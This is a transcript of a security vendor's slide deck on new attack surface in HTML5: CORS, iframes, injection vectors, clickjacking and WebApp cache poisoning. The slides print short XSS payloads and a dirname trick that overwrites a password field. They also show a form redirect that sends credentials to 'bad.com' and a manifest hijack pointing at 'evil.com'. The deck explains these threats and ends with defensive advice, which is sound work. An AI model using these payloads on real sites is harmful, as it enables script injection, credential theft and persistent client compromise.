HTML5 a clear & present danger

Download Report

Transcript HTML5 a clear & present danger 

HTML5
a clear & present danger
Renaud Bidou
CTO
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
1
1
Menu
1. HTML5 new capabilities
2. HTML5 tricks
3. Empowering common threats
4. Hackers’dreams come true
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
2
2
What’s new with HTML5
Securing & Accelerating Your Applications
7/17/2015
Deny All © 2012
7/17/2015
7/17/2015
Deny All © 2013
Deny All © 2012
3
3
HTML5 short history
• Project led by W3C
• Latest draft: HTML 5.1 – May 2, 2013
– Previous : December 17, 2012
– Previously : 13 drafts starting from January 22, 2008
• Why HTML5 ?
–
–
–
–
Make HTML content natively dynamic
Support offline mode
Increase security control and tuning
Improve internals for performance, task parallelization etc.
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
4
4
New HTML content
• On-the-fly graphics with the <canvas> tag
• Native MP3, Ogg and Wav audio format
support with the <audio> tag
• Native MP4, WebM and Ogg video format
support with the <video> tag
• Drag & Drop ! with draggable attribute and
ondrop event handler
• Embedded geolocation with the new
getCurrentPosition() method
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
5
5
Input Validation
• New input types through <input type> attribute
–
–
–
–
Email : type="email"
URL: type="url"
Numbers: type="number" type="range"
Date: type="date" type="month" type="week"
• Embedded format validator
– Based on type attribute value
– Can be enforced through the pattern attribute
– Can be disabled… don’t try to understand…
<form novalidate>
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
6
6
New forms inputs
<input type="email">
<input type="url">
<input pattern="d{4}"
placeholder="4 digits PIN">
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
<input type="number" min="0"
max="10" step="2" value="6">
Deny All © 2012
Deny All © 2013
7
7
New HTML internals
• Web Workers enable JavaScript background
processing
• Web Storage improves local storage to
extend the cookie concept and natively
support session-based data handling
• WebApp Cache to enable offline mode of
Web/Cloud based applications
• Server Sent Events (SSE) enables Server to
Client communication through the
established connection
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
8
8
HTML5 new security tricks
Securing & Accelerating Your Applications
7/17/2015
Deny All © 2012
7/17/2015
7/17/2015
Deny All © 2013
Deny All © 2012
9
9
iFrame Sandboxing
• iFrames sandboxing
– forbids forms, scripts, popups, access to cookies,
local storage
– considers the content being provided by another
domain
• iFrame sandboxes are not set by default
– Backward compatibility
– sandbox attribute to be explicitly set without value
<iframe src="iframe-source.html" sandbox="">
Not natural at all
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
10
10
Cross-document messaging
• Cross-document messaging
– provides mechanism for iframes to communicate with
parent document
– overrides HTML4 restrictions
• Implementation failure
– Parent frame to control sources of messages
– Rarely (never) performed
– Origin iframe identification not even enforced
window.parent.postMessage('hello', '*');
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
Origin iFrame ID
Wildcards are valid
& Recommended
11
11
iFrame insecurity
• Sandboxes are not applied
– iFrames provide access to local storage
– iFrames allows script execution and forms
• Thanks to cross-document messaging
– iFrames communicate with parent window
 HTML5 opens doors between iframes and parents
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
12
12
CORS
• Cross-Origin Resource Sharing
• Required for « modern » applications
• Browsers to handle 3rd party domains content handling
HTML5 powered browser
Site A
Site B
1
2
Request for 3rd party content
Main page
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
13
13
CORS tricky concept
• CORS « security » controls
Site A
GET /content.htm HTTP/1.1
Host: Site_B
Origin: http://Site_A
GET / HTTP/1.1
Host: Site_A
1
Site B
2
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://Site_A
HTTP/1.1 200 OK
• rely on
– Origin and Access-Control-Allow-Origin headers
– Relevant access control implemented on server
– Client  Server trust relationship
??????????????
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
14
14
CORS Security Issues
• Access control
– No implementation standard
– Often set as site-level through includes or left universal
Access-Control-Allow-Origin: *
 No reliable access control on server
• Preflighted requests
– Inform about supported methods
– Define security policy set on browser
– Responses are cached on client
 Browsers will not update their security policy
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
15
15
The Gig
1. CORS obsoletes SOP
2. iFrames are out of control
 Browsers are turned into proxies




« Native » browsing on internal networks
Powerful DoS capabilities
Accurate network (IP, port) scan behind the firewall
Etc.
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
16
16
Empowering usual attacks
Securing & Accelerating Your Applications
7/17/2015
Deny All © 2012
7/17/2015
7/17/2015
Deny All © 2013
Deny All © 2012
17
17
Injections heaven
• 31 HTML5 new tags
– 31 new injections vectors supported by browsers
<audio> <canvas> <command> <embed> <nav> <param> <source>
<ruby> <track> <video> …
• 52 + 1 HTML5 new script event handlers
– 52 on* injection points
+ formaction : will bypass on\w+= like filters
<form id="test" />
<button form="test" formaction="javascript:alert(1)">
 Thousands of new evasion combinations
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
18
18
Attributes you will love
• Self-triggering execution through autofocus
<input type="text" value="" onfocus="alert(1)" autofocus>
– Can be efficiently combined with appropriate handlers
<body onscroll=alert(1)>
<br><br><br><br><br><br>...<br><br><br>
<input autofocus>
Stealth user
abuseswith dirname
•  Overwrite
userinput
<form action="" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="captcha" value="" dirname="password"/>
<input type="submit">
</form>
username=admin&password=ltr&captcha=
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
19
19
Drag&Drop Jacking
• Abusing the D&D API
– Have a user drag & drop something
• Image, text, browser element (scrollbar, slider etc.)
– Set the value of dragged element to whatever you want
• Malicious data to be submitted on behalf of the user
• Confidential data to be stolen
– Have an invisible element follow the mouse
– Set the ondrop event handler of the iFrame to whatever …
• Feed form content (with malicious data) : CSRF
• Send content (stolen data) to 3rd party : Cross-domain data leak
 Bypasses cross-domain & CSRF protections
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
20
20
S’more Clickjacking
• External forms content definition
– Thanks to the form & formaction attributes
<form id='auth' action='/login'>
<input type='text' placeholder='login'>
<br><input type='password' placeholder='password'>
<br><input type='submit' value='Enter‘>
</form>
<input form='auth' type='submit' value='Enter HERE'
formaction='http://bad.com/thanks' >
– Can also be used to bypass CSRF protections
– Not that subtile, but still smarter than average users…
 Trivial data theft & CSRF protections bypass
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
21
21
XSS Unleashed
• Screenshots with XSS
– Thanks to <canvas> tag…
Hacker
Relay
5. Hacker retrieves screenshot
1. Hacker exploits
XSS vulnerability
4. Victim sends
screenshot
3. Victim executes
Javascript
Victim Browser
Securing & Accelerating Your Applications
2. Malicious Javascript is loaded on Victim
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
Vulnerable App
22
22
BotnetNG
• Bi-directional communication channel
– Server-Side Events to change web-based botnets behaviour
• Past :
– Agent regularly connect to C&C channel :
• to get commands and provide output
• « Easy » to identify and sign
– Threat is in  out
• Efficiently addressed with outgoing proxies
• Now:
– No recurring connections to C&C channel
• Commands sent by server / responses sent asynchronously
• No standard behaviour to modelize
– Threat is out  in
• Not addressed by web client security devices
 Botnet prevention mechanisms are obsolete
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
23
23
HTML5 Inside
Securing & Accelerating Your Applications
7/17/2015
Deny All © 2012
7/17/2015
7/17/2015
Deny All © 2013
Deny All © 2012
24
24
Password cracking
• A botnet case study
– Targets clients connected to compromised application
– Used to crack passwords
• Takes advantage of Web Workers
– Browsers compute hashes in the background
– Invisible to user, no impact on browser performances
• Just theory ?
– Ravan, Distributed JS Computing Systems
– Supports MD5 and SHA hashes
– Simply a PoC, user are asked for permission
 Web hackers’ version of distributed computing
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
25
25
Dream comes True
• Issues with injections
– Volatile: limited timeframe
– Persistent: can be removed from compromised DB
• The Hacker’s dream
– Persistent injections for unlimited timeframe
– Client-side persistency to prevent one-shot removal
• WebApp cache: HTML5 gift to the underground
– local HTML5 storage
– Independant from browser cache
• Not so easy to clean, whenever possible
– Prevents any request from the client
– Allow to cache anything, including the root of the application
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
26
26
WebApp Cache
• Browser requests a page
GET / HTTP/1.1
<!DOCTYPE HTML>
<html manifest="site.appcache">
…
<html>
Manifest file URL
• Browser gets the Manifest file
– Specifies pages to be locally cached
– Some more stuff
• Browser stores the files
– Never to be requested again
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
27
27
The Ultimate APT
• One Scenario
– Exploit a client-side injection vulnerability on a server (XSS)
• Can be volatile, will be used just once
– Have the client browser execute something like
document.getElementsByTagName("html")[0]\
.setAttribute("manifest","http://evil.com/bad.manifest");
Changes the manifest attribute to
– Set an entry in the corrupted manifest file to a corrupted file
• with « alternate » capabilties such as fishing or drive-by download
 Client access to application compromised forever
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
28
28
Conclusion
Securing & Accelerating Your Applications
7/17/2015
Deny All © 2012
7/17/2015
7/17/2015
Deny All © 2013
Deny All © 2012
29
29
 HTML5 opens doors between iframes and parents
 Browsers are turned into proxies
 Thousands of new evasion combinations
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
30
30
Preventing HTML5 abuses
• Identify new HTML5 content
– Tags, attributes, event handlers
• Identify previoulsy defined HTML5 content
– Now removed from recent drafts
– Still supported by browsers
• Evaluate suspicious combinations
– Tag name + attribute + event handler
• Efficiently identify script injections
– Don’t try to understand (you can’t)
– Identify the nature of data submitted to your application
• Enforce access restrictions
– In the core of applications for Cross-Document Messaging
– At the server level for CORS security
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
31
31
Thank you!
[email protected]
+33 1 46 20 96 00
Securing & Accelerating Your Applications
7/17/2015
7/17/2015
Deny All © 2012
Deny All © 2013
32
32